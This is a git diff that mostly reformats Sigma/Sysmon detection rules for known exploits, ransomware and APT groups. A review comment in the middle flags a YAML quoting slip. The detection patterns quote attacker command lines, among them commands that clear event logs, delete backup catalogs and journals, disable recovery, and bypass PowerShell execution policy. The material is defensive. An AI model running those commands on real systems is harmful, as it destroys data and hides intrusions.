 selection_cli_2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - net use https://docs.live.net
 - '@aol.co.uk'
 condition: process_creation and (1 of selection_*)
diff --git a/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml b/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml
index 623bf087b..bf9635e5d 100644
--- a/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml
+++ b/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml
@@ -1,8 +1,7 @@
 title: Exploit for CVE-2015-1641
 id: 7993792c-5ce2-4475-a3db-a3a5539827ef
 status: stable
-description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used
- in exploits for CVE-2015-1641
+description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
 references:
 - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
 - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
diff --git a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml
index bfa93a7ba..b3f6a0bfe 100644
--- a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml
+++ b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml
@@ -1,8 +1,7 @@
 title: Exploit for CVE-2017-0261
 id: 864403a1-36c9-40a2-a982-4c9a45f7d833
 status: test
-description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits
- for CVE-2017-0261 and CVE-2017-0262
+description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
 references:
 - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
 author: Florian Roth (Nextron Systems)
@@ -29,7 +28,6 @@ detection:
 Image|contains: \FLTLDR.exe
 condition: process_creation and selection
 falsepositives:
- - Several false positives identified, check for suspicious file names or locations
- (e.g. Temp folders)
+ - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml
index 108650792..b9901861d 100644
--- a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml
+++ b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml
@@ -1,8 +1,7 @@
 title: Droppers Exploiting CVE-2017-11882
 id: 678eb5f4-8597-4be6-8be7-905e4234b53a
 status: stable
-description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other
- sub processes like mshta.exe
+description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
 references:
 - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100
 - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw
diff --git a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml
index f94f64742..235d6ade7 100644
--- a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml
+++ b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml
@@ -1,8 +1,7 @@
 title: Exploit for CVE-2017-8759
 id: fdd84c68-a1f6-47c9-9477-920584f94905
 status: test
-description: Detects Winword starting uncommon sub process csc.exe as used in exploits
- for CVE-2017-8759
+description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
 references:
 - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
 - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
diff --git a/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml b/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml
index 38d7f7c5d..d77f7d10c 100644
--- a/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml
+++ b/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml
@@ -22,14 +22,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - CommandLine|contains|all:
- - \AppData\Roaming\Oracle
- - \java
- - '.exe '
- - CommandLine|contains|all:
- - cscript.exe
- - Retrive
- - '.vbs '
+ - CommandLine|contains|all:
+ - \AppData\Roaming\Oracle
+ - \java
+ - '.exe '
+ - CommandLine|contains|all:
+ - cscript.exe
+ - Retrive
+ - '.vbs '
 condition: process_creation and selection
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml b/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml
index 25cf25ac7..e7cae314b 100644
--- a/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml
+++ b/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml
@@ -22,7 +22,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - rundll32.exe
 - InstallArcherSvc
 condition: process_creation and selection
diff --git a/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml b/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml
index 7f259b5b8..40e135a1b 100644
--- a/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml
+++ b/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml
@@ -1,8 +1,7 @@
 title: Malware Shellcode in Verclsid Target Process
 id: b7967e22-3d7e-409b-9ed5-cdae3f9243a1
 status: test
-description: Detects a process access to verclsid.exe that injects shellcode from
- a Microsoft Office application / VBA macro
+description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
 references:
 - https://twitter.com/JohnLaTwC/status/837743453039534080
 author: John Lambert (tech), Florian Roth (Nextron Systems)
@@ -17,10 +16,7 @@ tags:
 logsource: category: process_access product: windows - definition: 'Requirements: The following config is required to generate the necessary - Event ID 10 Process Access events: VBE7.DLLUNKNOWN' + definition: 'Requirements: The following config is required to generate the necessary Event ID 10 Process Access events: VBE7.DLLUNKNOWN' detection: process_access: EventID: 10
diff --git a/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml b/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml
index 706bd22b2..8e3d1892d 100644
--- a/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml
+++ b/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml
@@ -1,9 +1,7 @@
 title: NotPetya Ransomware Activity
 id: 79aeeb41-8156-4fac-a0cd-076495ab82a1
 status: test
-description: Detects NotPetya ransomware activity in which the extracted passwords
- are passed back to the main module via named pipe, the file system journal of
- drive C is deleted and Windows eventlogs are cleared using wevtutil
+description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
 references:
 - https://securelist.com/schroedingers-petya/78870/
 - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
@@ -27,14 +25,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_specific_pattern:
- CommandLine|contains:
+ CommandLine|contains:
 - 'wevtutil cl Application & fsutil usn deletejournal /D C:'
 - dllhost.dat %WINDIR%\ransoms
 selection_rundll32:
 Image|endswith: \rundll32.exe
- CommandLine|endswith:
+ CommandLine|endswith:
 - .dat,#1
- - '.dat #1'
+ - '.dat #1' # Sysmon removes comma
 - .zip.dll",#1
 selection_perfc_keyword:
 - \perfc.dat
diff --git a/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml b/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml
index cdff94d9c..e9515aba7 100644
--- a/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml
+++ b/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml
@@ -1,8 +1,7 @@
 title: Potential PlugX Activity
 id: aeab5ec5-be14-471a-80e8-e344418305c2
 status: test
-description: Detects the execution of an executable that is typically used by PlugX
- for DLL side loading starting from an uncommon location
+description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
 references:
 - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/
 - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/
@@ -93,14 +92,7 @@ detection:
 - \Windows Kit
 - \Windows Resource Kit\
 - \Microsoft.NET\
- condition: process_creation and (( selection_cammute and not filter_cammute )
- or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu
- and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or (
- selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd
- ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng
- ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and
- not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc
- and not filter_rc ))
+ condition: process_creation and (( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc ))
 fields:
 - CommandLine
 - ParentCommandLine
diff --git a/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml b/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml
index 5f9f74097..b53d08b59 100644
--- a/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml
+++ b/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml
@@ -4,8 +4,7 @@ status: test
 description: Detects WannaCry ransomware activity
 references:
 - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
-author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community,
- Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro
 date: 2019/01/16
 modified: 2023/02/03
 tags:
@@ -28,37 +27,38 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection1:
- - Image|endswith:
- - \tasksche.exe
- - \mssecsvc.exe
- - \taskdl.exe
- - \taskhsvc.exe
- - \taskse.exe
- - \111.exe
- - \lhdfrgui.exe
- - \linuxnew.exe
- - \wannacry.exe
- - Image|contains: WanaDecryptor
+ - Image|endswith:
+ - \tasksche.exe
+ - \mssecsvc.exe
+ - \taskdl.exe
+ - \taskhsvc.exe
+ - \taskse.exe
+ - \111.exe
+ - \lhdfrgui.exe
+ # - '\diskpart.exe' # cannot be used in a rule of level critical
+ - \linuxnew.exe
+ - \wannacry.exe
+ - Image|contains: WanaDecryptor
 selection2:
- - CommandLine|contains|all:
- - icacls
- - /grant
- - Everyone:F
- - /T
- - /C
- - /Q
- - CommandLine|contains|all:
- - bcdedit
- - /set
- - '{default}'
- - recoveryenabled
- - 'no'
- - CommandLine|contains|all:
- - wbadmin
- - delete
- - catalog
- - -quiet
- - CommandLine|contains: '@Please_Read_Me@.txt'
+ - CommandLine|contains|all:
+ - icacls
+ - /grant
+ - Everyone:F
+ - /T
+ - /C
+ - /Q
+ - CommandLine|contains|all:
+ - bcdedit
+ - /set
+ - '{default}'
+ - recoveryenabled
+ - no
+ - CommandLine|contains|all:
+ - wbadmin
+ - delete
+ - catalog
+ - -quiet
+ - CommandLine|contains: '@Please_Read_Me@.txt'
 condition: process_creation and (1 of selection*)
 fields:
 - CommandLine
diff --git a/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml b/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml
index feb4ea82d..6b69846e8 100644
--- a/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml
+++ b/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml
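Review bot: The last value of the `bcdedit` block in selection2 loses its quoting in this hunk (`- 'no'` becomes `- no`), and a bare `no` is a boolean in YAML 1.1, so any consumer that loads this rule with a YAML 1.1 parser (PyYAML-based sigma tooling, for example) will get `False` rather than the string `no` inside `CommandLine|contains|all`, which either fails rule validation or silently changes what that branch matches. Every neighbouring value that needs protection (`'{default}'`, `'@Please_Read_Me@.txt'`) keeps its quotes, so this looks like an accidental drop rather than a deliberate choice. Restore the quoted form: `- 'no'`. Since this commit is an automated rule update, the fix presumably belongs in the converter that emits these files, otherwise the next run will reintroduce it; whether Hayabusa's own parser treats the bare token as a string I cannot tell from this diff, but quoting is cheap insurance for every other consumer.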
@@ -1,8 +1,7 @@
 title: Potential APT10 Cloud Hopper Activity
 id: 966e4016-627f-44f7-8341-f394905c361f
 status: test
-description: Detects potential process and execution activity related to APT10 Cloud
- Hopper operation
+description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
 references:
 - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
 author: Florian Roth (Nextron Systems)
@@ -23,9 +22,9 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_cscript:
 Image|endswith: \cscript.exe
- CommandLine|contains: '.vbs /shell '
+ CommandLine|contains: '.vbs /shell '
 selection_csvde:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - csvde -f C:\windows\web\
 - .log
 condition: process_creation and (1 of selection_*)
diff --git a/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml b/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml
index 4a4240d8d..d879f2007 100644
--- a/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml
+++ b/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml
@@ -1,8 +1,7 @@
 title: Ps.exe Renamed SysInternals Tool
 id: 18da1007-3f26-470f-875d-f77faf1cab31
 status: test
-description: Detects renamed SysInternals tool execution with a binary named ps.exe
- as used by Dragonfly APT group and documented in TA17-293A report
+description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
 references:
 - https://www.us-cert.gov/ncas/alerts/TA17-293A
 author: Florian Roth (Nextron Systems)
@@ -23,7 +22,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ps.exe -accepteula
 - -s cmd /c netstat
 condition: process_creation and selection
diff --git a/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml b/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml
index 00b5a210d..f7373e0db 100644
--- a/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml
+++ b/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml
@@ -1,8 +1,7 @@
 title: Lazarus System Binary Masquerading
 id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
 status: test
-description: Detects binaries used by the Lazarus group which use system names but
- are executed and launched from non-default location
+description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
 references:
 - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
 author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
diff --git a/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml b/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml
index d39c6d7f7..9fec7cae4 100644
--- a/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml
+++ b/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml
@@ -17,12 +17,7 @@ tags:
 logsource:
 product: windows
 category: pipe_created
- definition: Note that you have to configure logging for Named Pipe Events in Sysmon
- config (Event ID 17 and Event ID 18). The basic configuration is in popular
- sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but
- it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config,
- https://github.com/olafhartong/sysmon-modular. How to test detection? You
- can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
+ definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
 detection:
 pipe_created:
 EventID:
@@ -31,11 +26,12 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 PipeName:
- - \atctl
- - \comnap
- - \iehelper
- - \sdlrpc
- - \userpipe
+ - \atctl # https://www.virustotal.com/#/file/a4ddb2664a6c87a1d3c5da5a5a32a5df9a0b0c8f2e951811bd1ec1d44d42ccf1/detection
+ - \comnap # https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra
+ - \iehelper # ruag apt case
+ - \sdlrpc # project cobra https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra
+ - \userpipe # ruag apt case
+ # - '\rpc' # may cause too many false positives : http://kb.palisade.com/index.php?pg=kb.page&id=483
 condition: pipe_created and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml b/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml
index 6804020ac..276b97a0d 100644
--- a/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml
+++ b/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml
@@ -26,15 +26,15 @@ detection:
 selection_other_svchost:
 Image|endswith: \Microsoft\Network\svchost.exe
 selection_other_del:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - \Windows\Caches\NavShExt.dll
 - /c del
 selection_dll_path:
- CommandLine|endswith:
+ CommandLine|endswith:
 - \AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll
 - \AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
 selection_dll_function:
- CommandLine|contains: ',Setting'
+ CommandLine|contains: ',Setting'
 condition: process_creation and (1 of selection_other_* or all of selection_dll_*)
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml b/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml
index c103a3660..c62608505 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml
@@ -1,8 +1,7 @@
 title: APT27 - Emissary Panda Activity
 id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014
 status: test
-description: Detects the execution of DLL side-loading malware used by threat group
- Emissary Panda aka APT27
+description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
 references:
 - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
 - https://twitter.com/cyb3rops/status/1168863899531132929
@@ -29,7 +28,7 @@ detection:
 selection_svchost:
 ParentImage|contains: \AppData\Roaming\
 Image|endswith: \svchost.exe
- CommandLine|contains: -k
+ CommandLine|contains: -k
 condition: process_creation and (1 of selection_*)
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml b/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml
index 137b490e3..745cdeaeb 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml
@@ -27,17 +27,17 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_path:
 Image|endswith: \rundll32.exe
- CommandLine|contains:
+ CommandLine|contains:
 - '%LOCALAPPDATA%'
 - \AppData\Local\
 selection_extensions:
- - CommandLine|contains: .dat",
- - CommandLine|endswith:
- - '.dll #1'
- - '.dll" #1'
- - .dll",#1
+ - CommandLine|contains: .dat",
+ - CommandLine|endswith:
+ - '.dll #1'
+ - '.dll" #1'
+ - .dll",#1
 filter_main_exclude_temp:
- CommandLine|contains: \AppData\Local\Temp\
+ CommandLine|contains: \AppData\Local\Temp\
 condition: process_creation and (all of selection_* and not 1 of filter_main_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml
index ad105e312..c681983bc 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml
@@ -1,11 +1,10 @@
 title: APT29 2018 Phishing Campaign File Indicators
 id: 3a3f81ca-652c-482b-adeb-b1c804727f74
 related:
- - id: 7453575c-a747-40b9-839b-125a0aae324b
- type: derived
+ - id: 7453575c-a747-40b9-839b-125a0aae324b # ProcessCreation
+ type: derived
 status: stable
-description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported
- by mandiant
+description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
 references:
 - https://twitter.com/DrunkBinary/status/1063075530180886529
 - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml
index 918d53e47..ff0e302a2 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml
@@ -1,11 +1,10 @@
 title: APT29 2018 Phishing Campaign CommandLine Indicators
 id: 7453575c-a747-40b9-839b-125a0aae324b
 related:
- - id: 033fe7d6-66d1-4240-ac6b-28908009c71f
- type: obsoletes
+ - id: 033fe7d6-66d1-4240-ac6b-28908009c71f
+ type: obsoletes
 status: stable
-description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported
- by mandiant
+description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
 references:
 - https://twitter.com/DrunkBinary/status/1063075530180886529
 - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
@@ -26,10 +25,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - CommandLine|contains: -noni -ep bypass $
- - CommandLine|contains|all:
- - cyzfc.dat,
- - PointFunctionCall
+ - CommandLine|contains: -noni -ep bypass $
+ - CommandLine|contains|all:
+ - cyzfc.dat,
+ - PointFunctionCall
 condition: process_creation and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml b/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml
index 6ff705624..01dfeefed 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml
@@ -20,19 +20,19 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_mshta:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - vbscript:Close(Execute("CreateObject(
 - powershell
 - -w 1 -exec Bypass
 - \ProgramData\
 selection_survey:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - Win32_OperatingSystem
 - Win32_NetworkAdapterConfiguration
 - root\SecurityCenter2
 - '[System.Net.DNS]'
 selection_pwsh_backdoor:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - '[Convert]::ToBase64String'
 - '[System.Text.Encoding]::UTF8.GetString]'
 - GetResponse().GetResponseStream()
diff --git a/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml b/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml
index 63b188a38..2fea8f8f4 100644
--- a/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml
+++ b/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml
@@ -1,18 +1,17 @@
 title: OilRig APT Activity
 id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
 related:
- - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
- type: similar
- - id: c0580559-a6bd-4ef6-b9b7-83703d98b561
- type: similar
- - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5
- type: similar
+ - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
+ type: similar
+ - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
+ type: similar
+ - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry
+ type: similar
 status: test
 description: Detects OilRig activity as reported by Nyotron in their March 2018 report
 references:
 - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
-author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy,
- oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
 date: 2018/03/23
 modified: 2023/03/08
 tags:
@@ -35,7 +34,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_schtasks:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - SC Scheduled Scan
 - \microsoft\Taskbar\autoit3.exe
 selection_temp:
@@ -43,12 +42,12 @@ detection:
 Image|endswith: .exe
 selection_service:
